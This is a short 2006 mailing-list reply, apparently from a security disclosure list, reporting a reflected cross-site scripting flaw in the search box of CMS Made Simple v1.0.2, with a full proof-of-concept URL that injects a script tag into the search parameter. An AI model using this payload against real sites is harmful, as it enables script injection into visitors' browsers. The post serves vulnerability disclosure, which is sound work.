Re: XSS - CMS Made Simple v1.0.2 Dec 28 2006 02:35PM
nanoymaster gmail com
I can't remember if I posted another xss found (probably fond by someone else as well but I thought you might like to know)

in the search box or url oyu can put xss eg.

http://www.target.com/index.php?mact=Search%2Ccntnt01%2Cdosearch%2C0&cnt
nt01returnid=15&cntnt01searchinput="><script>alert('hi')</script>&cntnt0
1submit=Submit

obviously this doesn't count for much as it is non permanent... but still

enjoy
NanoyMaster

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus